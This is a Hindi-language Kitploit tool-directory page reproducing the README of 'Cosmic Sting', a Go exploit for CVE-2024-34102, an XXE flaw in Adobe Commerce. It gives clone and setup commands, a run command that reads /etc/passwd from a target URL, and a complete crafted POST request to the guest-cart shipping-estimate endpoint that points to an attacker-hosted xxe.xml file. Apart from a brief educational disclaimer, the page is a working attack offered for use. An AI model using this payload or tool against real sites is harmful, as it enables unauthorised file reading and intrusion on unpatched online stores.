Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34102 — शोषण CVE-2024-34102 | Kitploit
उपकरण/GitHubGitHub/bughuntar/cve-2024-34102
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbughuntar/cve-2024-34102

CVE-2024-34102

शोषण CVE-2024-34102

रिपॉजिटरी देखें
522 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Cosmic Sting: CVE-2024-34102 एक्सप्लॉइटर

Cosmic Sting एक Go-आधारित टूल है जिसे CVE-2024-34102, रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution) भेद्यता का फायदा उठाने के लिए डिज़ाइन किया गया है।

CVE-2024-34102 विवरण

Adobe Commerce के संस्करण 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 और उससे पहले के संस्करण XML एक्सटर्नल एंटिटी रेफरेंस ('XXE') के अनुचित प्रतिबंध से प्रभावित हैं, जिसके परिणामस्वरूप मनमाना कोड निष्पादन हो सकता है। कोई हमलावर बाहरी एंटिटीज़ का संदर्भ देने वाला एक क्राफ्टेड XML दस्तावेज़ भेजकर इस भेद्यता का फायदा उठा सकता है। इस समस्या के शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं होती है।

पूर्वापेक्षाएँ

  • Go (1.16 या उच्चतर)

स्थापना

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. निर्भरताएँ स्थापित करें (यदि कोई हों):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

एकल URL

एकल URL के साथ टूल चलाने के लिए:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

फ्लैग्स

  • -u, --url : एक्सप्लॉइट करने के लिए एकल URL।
  • -f, --file : SSRF के माध्यम से पढ़ने के लिए फ़ाइल।
  • -l, --list : एक्सप्लॉइट करने के लिए URL की सूची वाली फ़ाइल।

क्राफ्टेड XML DTD फ़ाइल POST अनुरोध:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

लाइसेंस

यह प्रोजेक्ट लाइसेंस प्राप्त नहीं है, यह केवल व्यक्तिगत प्रोजेक्ट के लिए बनाया गया है।

योगदान

योगदान का स्वागत है! किसी भी बदलाव के लिए कृपया एक issue खोलें या pull request सबमिट करें।

अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन सिस्टमों पर करें जिनका परीक्षण करने की आपके पास अनुमति है।

लेखक

Professor the Hunter --> मुझे Twitter पर फ़ॉलो करें

टूल डाउनलोड करें